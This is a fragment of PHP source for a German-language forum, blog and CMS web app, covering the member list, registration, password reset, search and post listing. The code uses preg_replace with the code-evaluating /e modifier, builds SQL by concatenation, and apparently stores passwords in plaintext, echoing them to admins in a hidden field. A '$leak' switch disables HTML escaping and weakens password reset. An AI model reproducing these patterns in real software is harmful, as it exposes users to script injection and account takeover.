.((intval($var['count'])) ? (($var['tcount']) ? "<span title='Neue Threads'>$var[tcount]</span>/" : "")."<a href='$self?id=$var[id]' title='Gesamtbeiträge'>$var[count]</a>" : "-")."</td><td align='center'>".(($var['blogs']) ? "<a href='$self/Blog/$var[username]'>$var[blogs]</a>" : '-')."</td><td align='center'>"
.(($status/2%2) ? ((intval($var['mails'])) ? "<a href='$self/Mail?id=$var[id]'>"
.(($var['rcount'] > 0) ? "<span title='Ungelesen'>$var[rcount]</span>/" : "")."<span title='Im Postfach'>$var[mails]</span></a>" : "-")."</td><td align='center'>"
.((intval($var['files'])) ? ((intval($var['pcount'])) ? "<a href='$self?s=d&id=$var[id]' title='Nur Öffendliche Dateien'>$var[pcount]</a>/" : '')."<a href='$self/Datei/$var[username]' title='Alle Dateien'>$var[files]</a>" : "-")."</td><td align='center'>" : '').(($status%2) ? (($var['status']/4%2 and is_null($var['chat']))
? "Frei" : (($var['chat']) ? (($status/2%2) ? "<a href='$self/Profil/$var[chatuser]' title='Im Chat mit $var[chatuser]'>Chat</a>" : "Chat") : "-"))
.(($var['status']/8%2 and ($var['chat'] or $var['status']/4%2)) ? " <span title='Verschlüsselt'>$lock</span>" : '')."</td><td align='center'>" : "")
.(($var['status']/2%2) ? 'Admin' : ((is_null($var['status'])) ? '-' : 'Benutzer'))
."</td><td align='center' nowrap>".(($var['status']%2) ? (($status/2%2) ? "<a href='$self/Abmelden?id=$var[id]' title='Abmelden'>Log in</a>" : "Log in") : "Log off")
."</td><td align='center'".(($leak and $status/2%2 and preg_match("!<(\w+)[^>]*>.*</\\1>!i",$var['tagline'])) ? " bgcolor='#ffe0e0'" : "").">".(($uid or $gast) ? "<a href='$self/Beitrag?mail=$var[id]' title='".strtr(preg_replace('/\t+.*$/','',$var['tagline']),$html)."'>Mail</a> " : (($var['page']) ? "" : "-")).(($var['page'] == '') ? "" : "<a href='".preg_replace('/^(?!https?:\/\/)/','http://',$var['page'])."'$tgb>www</a> ")
.(($status/2%2) ? "</td><td><a href='mailto:".rawurlencode("$var[fore] $var[last] <$var[mail]>")."' title='eMail'>$var[fore] $var[last]</a></td><td title='$var[agent]'>$var[ip]" : '')
."</td></tr>";
$out .= "<fieldset><legend><b>Mitglieder</b></legend><table border='1'><tr>".preg_replace($sorth[0],$sorth[1],"Benutzername=1\tErstanmeldung=2\tLetzte Aktion=3\tBeiträge=4\tBlogs=5\t(Mails=6)\t(Dateien=7)\t{Chat=8}\tRechte=9\tStatus=10\tKontakt=11\t(Vor-=12 / Nachname=13\tIP-Adresse=14)")."</tr>".implode("",$row)."</table><h4 align='center'>$code</h4></fieldset>";
}
}
# Anmelde Formular
if(preg_match('/^(Dat|Anmeld)en$/',$request) and ($uid or $user) and $rw) {
if($uid) {
$array = reset(($sql['aq']($conn,"select * from [user] where id=".(($status/2%2 and isset($_REQUEST['id']) and preg_match('/\d+/',$_REQUEST['id'],$var)) ? $var[0] : $uid),SQLITE_ASSOC)));
if($status/2%2)
$array['userpass'] = $array['password'];
elseif($array['password'] == '')
$post['userpass'] = '';
unset($array['password']);
if(preg_match('/^(\d+)-(?:(.+):)?(.+)$/',$array['passhelp'],$var)) {
if(!$post['question'] = $var[1])
$post['myquestion'] = $var[2];
$post['answer'] = $var[3];
}
foreach($array as $key => $var)
if(!isset($post[$key]) or strtolower($post[$key]) == strtolower($var))
$post[$key] = $var;
}
$out .= '<table align="'.((!$uid and $register) ? "right" : "center").'"><tr><td><form name="register" action="'.$self.'/'.$request.'" method="post"><fieldset><legend><b>Persönliche Daten</b></legend>
<small>Bitte geben Sie Ihre Daten ein'.((!$uid) ? ', um einen Benutzeraccount zu erstellen' : '').':<br />(Alle Felder mit einen * sind Pflichfelder!)</small>
<table><tr><td valign="top">'.(($status/2%2) ? '<input type="hidden" name="id" value="'.$post['id'].'" />' : '').'
'.preg_replace($formcheck[0],$formcheck[1],(($uid and $status/2%2 == 0) ? '<input type="hidden" name="username" value="'.$post['username'].'" />' : '{username|*Benutzername:|20|64}<br />')
.(($uid and $status/2%2 == 0) ? '{userpass|*Altes Kennwort:|*20|64}<br />' : '<input type="hidden" name="userpass" value="'.((isset($post['userpass'])) ? $post['userpass'] : '').'" />').'{password,probate|*Kennwort:|*20|64}<br />{probate,password|*Kennwort wiederholen:|*20|64}</td>
<td valign="top">{forename|*Vorname:|20|64}<br />{lastname|*Nachname:|20|64}<br />{mail|*eMail:|20|255}<br /></td>
<td valign="top"><small>Geburtstag: <font size="1">(TT.MM.JJJJ)</font></small><br /><input type="text" size="20" maxlength="10" name="born" value="'.((isset($post['born'])) ? preg_replace('/(\d{4})-(\d{2})-(\d{2})/','$3.$2.$1',$post['born']) : '').'" /><br />{town|Wohnort:|20|64}<br />{page|Homepage:|20|255}<br /></td></tr>
<tr><td colspan="2"><small>Persönliche Frage: (Benötigt für Kennwort Vergessen)</small><br />
<select size="1" name="question" style="width:100%'.(($leak) ? '"' : ((isset($post['myquestion']) and $post['myquestion'] != '') ? ";display:none" : "").'" onchange="'.preg_replace($js,'',"
if(this.value == '-') {
this.style.display = 'none';
this.selectedIndex = '0';
var x = document.getElementsByName('myquestion')[0];
x.style.display = 'block';
x.focus();
}").'"').'>'.implode("\n",preg_replace('/.+/e','"<option value=\'".((isset($x)) ? ($x++)+1 : $x=0)."\'".((isset($post[\'question\']) and $post[\'question\'] == $x) ? " selected" : "").">$0</option>"',$pass))
.(($leak) ? ((isset($post['myquestion']) and $post['myquestion'] != '') ? "<option value='0' selected>$post[myquestion]</option>" : "")."</select><input type='hidden' name='myquestion' value='".((isset($post['myquestion'])) ? $post['myquestion'] : '')."' />" : "<option value='-'>Eigene Frage stellen...</option></select>")
.(($leak) ? "" : "<input type='text' style='width:100%".((isset($post['myquestion']) and $post['myquestion'] != '') ? "" : ";display:none")."' name='myquestion' size='40' maxlength='96' value='".((isset($post['myquestion']) and $post['myquestion'] != '') ? $post['myquestion'] : "")."' onblur='".preg_replace($js,'','
if(this.value == "") {
this.style.display = "none";
var x = document.getElementsByName("question")[0];
x.style.display = "block";
x.focus();
}')."'>").'</td><td>{answer|Persönliche Antwort:|20|96}</td></tr>
<tr><td colspan="3" align="center"><input type="hidden" name="info" value="" /><input type="submit" name="'.(($uid) ? 'change" value="Ändern' : 'register" value="Anmelden').'" /> <input type="submit" name="stop" value="Abbrechen" />
'.(($uid or $status/2%2) ? '<input type="submit" name="kill" value="Mitgliedschaft beenden" onclick="return confirm(\'Wirklich Löschen?\')" />' : "")).'
</td></tr></table></fieldset></form></td></tr></table><script type="text/javascript">'."<!--\n".preg_replace($js,'','
x = document.register,
x.info.value = screen.width + "," + screen.height + "," + screen.colorDepth;
((x.username.type == "text") ? x.username : (x.userpass.value == "") ? x.userpass : x.password).focus();').'//--></script>';
if($request == "Anmelden" and $register)
$out .= "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),strtr($sql['sq']($conn,"
select content
from cms
where name like '$register'
limit 1"),array_slice($html,1)))."</div>";
}
# Kennwort Vergessen Formular
if($request == 'Kennwort' and !$uid and $rw)
$out .= '<table align="center"><tr><td><form name="password" action="'.$self.'/'.$request.'" method="post"><fieldset><legend><b>Kennwort Vergessen</b></legend>
<small>Bitte geben Sie Ihre Daten ein, um ihr Kennwort zu löschen!<br />(Alle Felder mit einen * sind Pflichfelder!)</small>
<table><tr><td'.preg_replace($formcheck[0],$formcheck[1],(($leak) ? ' colspan="2"' : '').'>{username|*Benutzername:|20|64|onblur=getask()'.(($leak) ? '|style=width:100%}</td></tr>' : '}<br />{mail|*eMail:|20|64|onblur=getask()}</td><td>{forename|*Vorname:|20|64}<br />{lastname|*Nachname:|20|64}</td></tr>')
.'<tr><td colspan="2"><small>'.((isset($post) and (!isset($post['question']) or !$post['question'] and !isset($post['myquestion']))) ? '<font color="#ff0000">*Persönliche Frage:</font>' : '*Persönliche Frage:').'</small><br />
<select size="1" name="question" style="width:100%">'.implode("\n",preg_replace('/.+/e','"<option value=\'".((isset($x)) ? ($x++)+1 : $x=0)."\'".((isset($post[\'question\']) and $post[\'question\'] == $x) ? " selected" : "").">".(($x == 0 and isset($post["myquestion"]) and $post["myquestion"]) ? "$post[myquestion]" : "$0")."</option>"',$pass)).'</select><br />
{answer|*Persönliche Antwort:|20|255|style=width:100%}<br /></td></tr>
<tr><td>{password,probate|*Neues Kennwort:|*20|64}</td><td>{probate,password|*Kennwort wiederholen:|*20|64}</td></tr>
<tr><td colspan="2"><center><input type="submit" name="restore" value="Kennwort zurücksetzen" /> <input type="submit" name="stop" value="Abbrechen" /></center></td></tr>
</table></fieldset></form></td></tr></table><script type="text/javascript">')."<!--\n".preg_replace($js,'',"
document.password.username.focus();
try { // Request vorbereiten
var a = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
a = new ActiveXObject('Microsoft.XMLHTTP');
}
var g,f = document.password, e = f.question, d, c = document.getElementsByTagName('option')[0].firstChild, b = c.nodeValue;
function getask() {
if(f.username.value != ''".(($leak) ? '' : " && f.mail.value != ''").") {
a.open('GET','$self?ask=' + f.username.value".(($leak) ? '' : " + ':' + f.mail.value").",false); // Frage vom Benutzer anfordern
a.send('');
d = 0;
if((g = a.responseText.match(/^(\d+)-(.*)$/)))
if(g[1] > 0)
d = g[1];
else
c.replaceData(0,c.nodeValue.length,g[2]);
else
c.replaceData(0,c.nodeValue.length,b);
e.selectedIndex = d;
}
}").'//--></script>';
# Suchformular
if($request == 'Suche') {
$usr = $sql['aq']($conn,"
select u.id as id,
username as username,
count(a.id) as acount,
count(b.id) as bcount,
ifnull(dcount,0) as dcount,
count(f.id) as fcount,
count(m.id) as mcount,
max( ifnull(max(a.[create]),0),
ifnull(max(d.ctime),0)) as time
from ( select 0 as id, 'Unbekannt' as username
union
select id,username
from [user] as u
where status is not null) as u
left join ( select user,count(*) as dcount,[create] as ctime
from file
where status ".(($status%4 == 0) ? '' : '<')."= 1
group by user) as d on u.id = d.user
left join forum as a on u.id = a.userid
and a.status".(($status%4 == 0) ? "%2 = 0" : " is not null")."
left join forum as b on a.id = b.id
and b.mailid = b.userid
left join forum as f on a.id = f.id
and f.mailid is null
left join forum as m on a.id = m.id
and m.mailid is not null
and m.mailid != m.userid
".(($status/2%2) ? '' : str_replace('x',(($uid) ? $uid : 0),"and (m.mailid = x or m.userid = x)"))."
group by u.id
having acount > 0 or dcount > 0
order by username");
$wrt = array('b' => 0, 'd' => 0, 'f' => 0, 'm' => 0);
$array = array();
$val = 0;
foreach($usr as $key => $var) {
$usr[$key] = "<option value='$var[id]'".((isset($_GET['id']) and $_GET['id'] == $var['id']) ? " selected" : '').">$var[username]</option>";
$array[$var['id']] = $var['id'];
if($val < $a = strtotime($var['time']))
$val = $a;
foreach(array_keys($wrt) as $a) {
$array[$var['id']] .= ','.$var[$a.'count'];
if($var[$a.'count'])
$wrt[$a] += $var[$a.'count'];
}
}
$rows = array();
if($wrt['b'])
$rows[] = "<option value='b'".(($s == 'b') ? ' selected' : '').">Blog ($wrt[b])</option>";
if($var = $sql['sq']($conn,"select count(*) from [cms] where status/8%2".(($status/2%2) ? "" : " and status/2%4 <= ".($status/2%2 + $status%2*2))))
$rows[] = "<option value='c'".(($s == 'c') ? ' selected' : '').">CMS ($var)</option>";
if($wrt['d'])
$rows[] = "<option value='d'".(($s == 'd') ? ' selected' : '').">Datei ($wrt[d])</option>";
if($wrt['f'])
$rows[] = "<option value='f'".(($s == 'f' or !$s) ? ' selected' : '').">Forum ($wrt[f])</option>";
if($wrt['m'])
$rows[] = "<option value='m'".(($s == 'm') ? ' selected' : '').">Mail ($wrt[m])</option>";
$line = array();
foreach(array(1,2,3,5,10,20,25,50,75,100) as $var)
$line[] = "<option value=',$var'".((isset($_GET['page']) and $var == $max) ? ' selected' : '').">$var</option>";
$out .= "<form name='search' action='$self' method='get'><table align='center'><tr><td><fieldset><legend><b>Suche</b></legend>
<table><tr><td width='99%'><small><a href='#' id='ash' title='Suchhilfe ein/ausblenden' onClick='".preg_replace($jshide[0],$jshide[1],"help;2")."'>Suchbegriff</a>:"
.((isset($_SESSION['lua']) and strtotime($_SESSION['lua']) < $val) ? " <span title='Seit: ".date('d.m.Y H:i:s',strtotime($_SESSION['lua']))."'><input type='checkbox' id='new' name='new' value='1'"
.((isset($_GET['new'])) ? " checked" : "")."><label for='new'>Neuheiten</label></span>" : "")
.(($status/2%2) ? " <a href='#' onClick='document.search.q.value=\"-\";document.search.submit()'>Gelöschtes Suchen</a>" : "")
."</small><br /><input type='text' name='q' value='".strtr($q,$html)."' size='60' style='width:100%' /></td>"
.((count($rows)) ? "<td><small>Ort</small><br /><select name='s' size='1' onchange='chg(this.value)'>".implode("",$rows)."</select></td>" : "")
.((count($usr) > 1) ? "<td><small>Benutzer</small><br /><select name='id' size='1' id='user'><option value=''".((!isset($_GET['id']) and !$id) ? " selected" : "").">Alle Benutzer</option>".implode("",$usr)."</select></td>" : "")
."<td><small>Max</small><br /><select size='1' name='page'><option value=','> </option>".implode('',$line)."</select></td></tr>
<tr><td colspan='4' align='center'><input type='submit' value='Suchen' /><div id='help' class='cr' align='left' style='display:".((isset($_COOKIE['hide']) and ($_COOKIE['hide']/(1<<2))%2) ? 'block' : 'none')."'>".@preg_replace(array_keys($creole),array_values($creole),"**++Suchhilfe:++**
|100%
|=Suchbegriff |=findet |=findet nicht |=Beschreibung |
|@@<<style color:green 'Anlage'>> blumen@@ |Stereo<<style color:green '__anlage__'>> |Blütenbeet |**ODER**-Suche --(//Mindestens eins muss vorkommen//)-- |
|@@**+**<<style color:green 'Haus'>> **+**<<style color:green 'baum'>>@@ |<<style color:green '__Baumhaus__'>> |<<style color:blue 'Haus'>>katze |**UND**-Suche --(//Alle müssen vorkommen//)-- |
|@@<<style color:green 'Auto'>> **-**<<style color:red 'reifen'>> **-**spur@@ |<<style color:green '__Auto__'>>matisch |<<style color:blue 'Auto'>><<style color:red '__reifen__'>> |**NICHT-ODER**-Suche --(//Keins darf vorkommen//)-- |
|@@**\"**<<style color:green 'Haus im Garten'>>**\"**@@ |<<style color:green '__Haus im Garten__'>> |Im Garten<<style color:blue haus>> |**Satz**-Suche --(//Genau wie vorgegeben//)-- |
|@@<<style color:green 'wein'>>**~***<<style color:green 'glass'>>@@ |<<style color:green '__Wein__'>>trauben<<style color:green '__glass__'>> |Glass <<style color:blue Wein>> |**Platzhalter** @@**~***@@--(//Für alles oder nichts//)-- |
|@@<<style color:green 'Rollt'>>**?**<<style color:green 'r'>>@@ |<<style color:green '__Rollt__'>>o<<style color:green '__r__''>> |<<style color:blue 'Rollt'>>reppe |**Platzhalter ?** --(//Für **EIN** Zeichen//)-- |")."</div></td></tr></table></fieldset></td></tr></table></form><script type='text/javascript'><!--\n".preg_replace($js,'',"
function chg(x) {
if((y = document.getElementById('user'))) {
z = y.getElementsByTagName('option');
e = a.indexOf(x);
for(d=1;d<z.length;d++) {
f = c[z[d].value].split(',');
z[d].firstChild.replaceData(0,z[d].firstChild.data.length,z[d].firstChild.data.replace(/\s.*/,'') + ' ' + '(' + f[e] + ')');
if(parseInt(f[e],10) > 0) {
z[d].style.display = 'block';
z[d].disabled = false;
}
else {
z[d].style.display = 'none';
z[d].disabled = true;
}
}
if(x == 'c') {
y.setAttribute('disabled',1);
y.selectedIndex = 0;
}
else
y.removeAttribute('disabled');
}
}
var a = 'c".implode('',array_keys($wrt))."',
b = '".implode(':',$array)."'.split(':'),
c = [],
d,e,f,x,y,z;
for(x=0;x<b.length;x++) {
y = b[x].match(/^(\d+),.*$/);
c[y[1]] = y[0];
}
chg(document.search.s.value);
document.getElementById('ash').setAttribute('href','#');
document.search.q.focus();
")."//--></script>";
}
# Forum Beiträge mit Smilies & paging anzeigen
if(preg_match('/^(Blog|Mail|Forum)?$/',$request) or ($out == '' or substr($out,-21) == '//login//--></script>')
and !(isset($_REQUEST['request']) and $_REQUEST['request'] == 'Impressum' or $request == 'Impressum')) {
$wrt = array(); // Schablone für Suchanfrage als SQL-WHERE-Query
if(preg_match_all('/([-+]?)(".+?(?<!\\\\)"|\'.+?(?<!\\\\)\'|\S+)/',$q,$val)) {
foreach($val[1] as $key => $var) {
$key = preg_replace(array('/^([\'"])(.+)\1$/','/\\\\(?=[\'"])|\*+(?=\*)|^\*+|\*+$/'),array('$2',''),$val[2][$key]);
$val[3][$var][] = " like '%".$sql['es'](strtr($key,array('%' => '%%', '_' => '__', '*' => '%', '?' => '_')))."%'";
if($var != '-' and $key)
$wrt[] = strtr(preg_quote($key,'/'),array('\\?' => '.', '\\*' => '.*?'));
}
foreach($val[3] as $key => $var)
$val[3][$key] = (($key == '-') ? "not " : "")."(".implode((($key == '+') ? ' and ' : ' or '),$var).")";
$val = implode(' and ',$val[3]);
}
else
$val = " like '%".$sql['es']($q)."%'";
if(!$request and preg_match('/^[cd]$/',$s)) { // CMS oder Datei
$usr = array((($s == 'c')
? (($status/2%2) ? "" : "c.status/2%4 <= ".($status/2%2 + $status%2*2)." and ").(($q == '-' and $status/2%2) ? "c.status is null" : str_replace(' ',"c.name||ifnull(c.description,'')||c.content",$val))
: "(".(($status/2%2) ? "a.status is".(($q == '-') ? "" : " not")." null" : "a.status%2 = 1".(($uid) ? " or a.status = 0 or a.user = $uid and a.status is not null" : "")).")".(($id !== false) ? " and a.user=$id" : "").(($status/2%2 and $q == '-') ? ""
: " and a.status/2%2 = 0 and (".str_replace(' ',"a.name||ifnull(a.info,'')",$val)." or ".str_replace(' ',"a.type like 'text/%' and b64d(ifnull(a.data,''))",$val).")")),((isset($_GET['id'])) ? $_GET['id'] : $id));
$new = (isset($_GET['new']) and isset($_SESSION['lua'])) ? " and ".(($s == 'd') ? 'a.' : '')."[create] > datetime('$_SESSION[lua]')" : '';
$num = $sql['sq']($conn,"select count(*) from ".(($s == 'c') ? "[cms] as c where c.status/8%2 and" : "[file] as a where")." $usr[0]$new");
if($q)
$q = array(0,$q,$wrt);
}
else { // Mail oder Blog
$mail = " where f.mailid ";
if(($request == 'Mail' or $s == 'm') and $uid) {
$var = ($status/2%2 and $id) ? $id : $uid;
$mail .= "= $var and f.mailid != f.userid ".(($q == '-') ? '' : "and f.status/2%2 = 0 or (f.mailid = $var or f.userid = $var and f.mailid is not null) and f.mailid != f.userid ");
}
elseif($request == 'Blog' or $s == 'b') { // Blog
$mail .= "= f.userid".(($q == '-') ? '' : " and f.status is not null");
$var = false;
if($mid)
$var = $mid;
elseif($id)
$var = $id;
// elseif(!$s) $var = $uid;
if($var)
$mail .= " and f.userid = $var";
}
else // Mail
$mail .= "is null";
if($status%4 == 0)
$mail .= " and f.status%2 = 0";
$usr = (isset($_GET['id']) and ($request != false or count($_POST) == 0) and preg_match('/^\d+$/',$_GET['id'],$var)) ? array(" and (f.userid = $var[0] or f.mailid = $var[0])",$var[0],(($var[0]) ? $sql['sq']($conn,"select username from [user] where id=$var[0]") : null)) : array('');
if($q != '') { // Suchanfrage zu SQL-Where-Query finalisieren
if($q == '-')
$v = " and f.status is null";
elseif(preg_match('/^\d+$/',$q))
$v = " and (f.id = $q or f.path like '%/$q/%')";
else
$v = " and ".str_replace(' ',"ifnull(f.title,'')||f.message",$val);
$q = array($v,$q,$wrt);
}
if(!is_array($q))
$q = array('');
if(!isset($_GET['q']) and !isset($_GET['b']) and "$usr[0]$q[0]" == "")
$q[0] = ' and f.path is null';
elseif("$usr[0]$q[0]" == "")
$q[1] = "";
$new = (isset($_GET['new']) and isset($_SESSION['lua'])) ? " and f.[create] > datetime('$_SESSION[lua]')" : '';
$num = $sql['sq']($conn,"
select count(*)
from [forum] as f
left join [user] as u on f.userid = u.id "
.(($status/2%2 and isset($q[1]) and $q[1] == "-") ? '' : " and f.status is not null and u.status is not null")."
$mail$usr[0]$q[0]$new");
}
preg_replace($paging[5],$paging[6],"$num,$max,<a href='$self".(($request != '') ? "/$request" : '')."?page=#key##max#".((count($usr) > 1) ? "&id=$usr[1]" :'').(($sort) ? "&sort=$sort" : "").((count($q) > 1) ? "&q=".urlencode($q[1]) : '')."' title='#var#'>#key#</a>");
if(!$page[0])
$val = max(0,$num-$max);
$rows = array();
if($s == 'c') { // CMS
$line = $sql['aq']($conn,"
select c.id as id,
c.[create] as 'create',
c.change as change,
c.status as '.status',
ifnull(c.status/2%4,'-1') as right,
ifnull(nullif(c.name,''),'Startseite') as name,
c.description as title,
ifnull(d.content,c.content) as '.content',
(select username from user where status/2%2 = 1) as 'from',
'cms' as type
from [cms] as c
left join [cms] as d on d.name like c.content
where c.status/8%2 and $usr[0]$new
order by c.id
limit $val,$max");
foreach($line as $var) {
$creolevar = array_merge($creolevar,$var);
$val = array(min((($val[0]) ? $val[0] : $var['id']),$var['id']),max($val[1],$var['id']));
$rows[] = "<fieldset><legend>(".(($status/2%2 or $status%4 == 1 and $var['.status']/2%4 == 2) ? "<a href='$self/CMS?id=$var[id]'>$var[id]</a>" : $var['id']).") <a href='$self/$var[name]'>$var[name]</a>"
.(($var['title']) ? " <small class='cr'>(".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $var['title'] : strtr($var['title'],array_slice($html,1)))).")</small>" : "")
."</legend><div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $var['.content'] : strtr($var['.content'],array_slice($html,1))))."</div></fieldset>";
}
$var = array('Seite','Seiten','Seiten');
$usr = array();
}
elseif($s == 'd') { // File
$line = $sql['aq']($conn,"
select a.id as id,
ifnull(a.user,0) as user,
a.name as name,
a.info as info,
ifnull(a.size,b.size) as size,
ifnull(a.type,b.type) as type,
ifnull(u.id,0) as uid,
u.status as ustat,
u.username as username
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
where $usr[0]$new
order by a.id
limit $val,$max");
$a = 0;
foreach($line as $var) {
$val = array(min((($val[0]) ? $val[0] : $var['id']),$var['id']),max($val[1],$var['id']));
$name = ($status/2%2 or $uid == $var['uid']) ? $var['id'] : "$var[uid]-$var[name]";
$rows[] = "<fieldset><legend>(".(($status/2%2 or $uid == $var['uid']) ? "<a href='$self/file?$var[id]'>$var[id]</a>" : $var['id']).") <a href='$self/file?$var[user]-$var[name]'>$var[name]</a> - ".number_format(abs($var['size']),0,'','.')." Bytes"
." <small>von ".((is_null($var['username'])) ? "Unbekannt" : "<a href='$self/Profil?id=$var[uid]' title='Profil anzeigen'>".((is_null($var['ustat'])) ? "<font color='#ff0000'>$var[username]</font>" : $var['username'])."</a>")
.(($var['info']) ? " <span class='cr'>(".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $var['info'] : strtr($var['info'],array_slice($html,1)))).")</span>" : "")
."</small></legend>"
.((($usr = preg_replace('/^([^\/]+)\/.*$/','$1',$var['type'])) == 'image') ? "<img src='$self/file?$name' alt='$var[name]' />"
: (($usr == 'text') ? "<script type='text/javascript'><!--\n".preg_replace($js,"",(($a++) ? "" : "
try {
var A = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
A = new ActiveXObject('Microsoft.XMLHTTP');
}
function Load(a) {
A.open('GET','$self/file?' + a,false);
// A.overrideMimeType('text/plain; charset=iso-8859-1');
A.send('');
document.write('<pre style=\"white-space:pre-wrap\">' + A.responseText.replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>') + '<\/pre>');
}")."Load('$name');")."//--></script><noscript><iframe src='$self/file?$name' width='100%'></iframe></noscript>"
: (($usr == 'video') ? "<video src='$self/file?$name' preload='metadata' autobuffer controls>$self/file?$name</video>"
: (($usr == 'audio') ?"<audio src='$self/file?$name' controls>$self/file?$name</audio>"
: "<b>Download</b>: <a href='$self/file?$name'>$var[name]</a>"))))."</fieldset>";
}
$var = array('Datei','Dateien','Dateien');
$usr = array();
}
else {
$wrt = ($status/2%2 and isset($q[1]) and $q[1] == "-") ? 0 : "status is not null";
$rows = $sql['aq']($conn,"
select f.id as id,
f.[create] as 'create',
f.[change] as change,
f.changes as changes,
ifnull(f.status/2%2,'-1') as 'right',
strftime('%d.%m.%Y %H:%M:%S',f.[create]) as crdatum,
strftime('%d.%m.%Y %H:%M:%S',f.change) as chdatum,
f.title as title,
f.message as message,
f.status as 'f.status',
u.status as 'u.status',
s.status as 's.status',
u.username as username,
u.tagline as tagline,
f.userid as userid,
f.path as path,
r.title as rtitle,
b.username as ruser,
r.userid as ruid,
b.status as rstat,
strftime('%d.%m.%Y %H:%M:%S',r.[create]) as rdate,
t.id as 't.id',
f.mailid as mailid,
s.username as mailto
from [forum] as f
left join [forum] as r on f.path like '%/'||r.id||'/'" .(($wrt) ? " and r.$wrt" : '')."
left join [forum] as t on t.path like '%/'||f.id||'/'" .(($wrt) ? " and t.$wrt" : '')."
left join [user] as u on u.id = f.userid" .(($wrt) ? " and f.$wrt and u.$wrt" : '')."
left join [user] as b on b.id = r.userid" .(($wrt) ? " and b.$wrt" : '')."
left join [user] as s on s.id = f.mailid" .(($wrt) ? " and s.$wrt" : '')."
$mail$usr[0]$q[0]$new
group by f.id
order by f.id
limit $val,$max",SQLITE_ASSOC);
$wrt = array();
if($getopt != '')
$wrt[] = $getopt;
if($page[1] != '')
$wrt[] = $page[1];
$wrt = "?".implode('&',$wrt).((count($wrt) > 0) ? '&' : '');
foreach($rows as $key => $var) {
if($uid and $uid == $var['mailid'] and !floor($var['f.status']/2))
$sql['e']($conn,"update [forum] set status=status%2+2 where id=$var[id]");
$val = array(min((($val[0]) ? $val[0] : $var['id']),$var['id']),max($val[1],$var['id']));
$creolevar = array_merge($creolevar,array('type' => 'forum', 'id' => $var['id'], 'name' => $var['id'], 'title' => $var['title'], 'from' => $var['username'], 'create' => strtotime($var['create']), 'change' => strtotime($var['change']), 'right' => $var['right']));
$line = array();
if(isset($_SESSION['uid']) and $_SESSION['uid'] or $gast) {
if((is_null($var['mailto']) or $var['mailid'] == $uid) and ($var['userid'] != $uid or $status%4 == 3 and $var['userid'] != $var['mailid']))
$line[] = "<a href='$self/Beitrag?id=$var[id]'>Antworten</a>";
if((is_null($var['mailto']) or $var['mailid'] == $uid) and $var['userid'] === $var['mailid']) {
$uedit = "Beitrag?id=$var[id]";
$line[] = "<a href='$self/$uedit'>Bearbeiten</a>";
}
if($uid and $var['mailid'] == $uid)
$line[] = "<a href='$self/".(($var['userid'] == $var['mailid']) ? 'Blog' : 'Mail')."?kill=$var[id]' onclick='return confirm(\"Wirklich Löschen?\")'><font color='#ff0000' title='Löschen'><b>X</b></font></a>";
}
$rows[$key] = "<fieldset class='cr'><legend>"
.(($status%4 == 3) ? "<a href='$self/Admin$wrt"."edit=$var[id]' title='Bearbeiten'>".((is_null($var['f.status'])) ? "<font color='#ff0000'>($var[id])</font>" : "($var[id])")."</a> " : "(<a$rel href='$self/Source?q=$var[id]' title='Quelltext'>$var[id]</a>) ")
.((is_null($var['t.id'])) ? "<span onclick=\"location.href='$self/$request?page=1&q=$var[id]'\">" : "<a href='$self".(($request == 'Mail') ? "/Mail?".(($id) ? "id=$id&" : "") : (($request == 'Blog') ? "/Blog/$var[username]?" : "?"))."page=1&q=$var[id]' title='Antwort suchen'>")
.((is_null($var['title'])) ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),(($leak) ? $var['title'] : strtr($var['title'],array_slice($html,1))))."</b>")
.((is_null($var['t.id'])) ? "</span>" : "</a>").(($var['f.status']%2) ? "<b title='Nix für Gäste'>*</b>" : "")
." <small>(Vom $var[crdatum]".(($var['create'] != $var['change']) ? " / <span title='Änderungen: $var[changes]'>Geändert: $var[chdatum]</span>" : '')
.(($var['userid'] === $var['mailid'] and ($mid or $id)) ? ")" : " von "
.((is_null($var['username'])) ? "Unbekannt" : "<a href='$self/Profil/$var[username]' title='Profil anzeigen'>".((is_null($var['u.status'])) ? "<font color='#ff0000'>$var[username]</font>" : $var['username'])."</a>")
.((!is_null($var['mailid']) and $var['userid'] != $var['mailid']) ? " an "
.((is_null($var['mailto'])) ? "Unbekannt" : "<a href='$self/Profil/$var[mailto]' title='Profil anzeigen'>".((is_null($var['s.status'])) ? "<font color='#ff0000'>$var[mailto]</font>" : $var['mailto'])."</a> [<font color='#".((floor($var['f.status']/2)) ? "00a000'>" : "a00000'>un")."gelesen</font>]") : "").")")
.((is_null($var['path']) or is_null($var['ruid'])) ? "" : " - Antwort auf <a href='$self/$request".(($request == 'Blog') ? "/$var[username]" : '')."?".(($request == 'Mail' and $id) ? "id=$id&" : '')."page=1&q=".preg_replace('!^.*/(\d+)/$!','$1',$var['path'])."' title='Reference suchen'>"
.((is_null($var['rtitle'])) ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),(($leak) ? $var['rtitle'] : strtr($var['rtitle'],array_slice($html,1))))."</b>")
."</a> (Vom $var[rdate] von ".((is_null($var['ruser'])) ? 'Unbekannt'
:"<a href='$self/Profil/$var[ruser]' title='Profil anzeigen'>"
.((is_null($var['rstat'])) ? "<font color='#ff0000'>$var[ruser]</font>" : "$var[ruser]")."</a>").")")
.((!is_null($var['t.id']) and $row = $sql['sq']($conn,"select count(*) from [forum] where path like '%/$var[id]/%'".(($status/2%2) ? '' :" and status is not null"))) ? " - <a href='$self".(($request == 'Mail') ? "/Mail?".(($id) ? "id=$id&" : "") : (($request == 'Blog') ? "/Blog/$var[username]?" : "?"))."page=1&q=$var[id]' title='Antwort suchen'>$row Antwort".(($row > 1)?"en":"")."</a>" : "")
."</small><br /></legend>"
.((count($line) > 0 and !is_null($var['f.status'])) ? "<table align='right'><tr><td align='center'><small>".implode(' | ',$line)."</small></td></tr></table>" : '')
.@preg_replace(array_keys($creole),array_values($creole),strtr($var['message'],(($leak) ? array() : array_slice($html,1)))
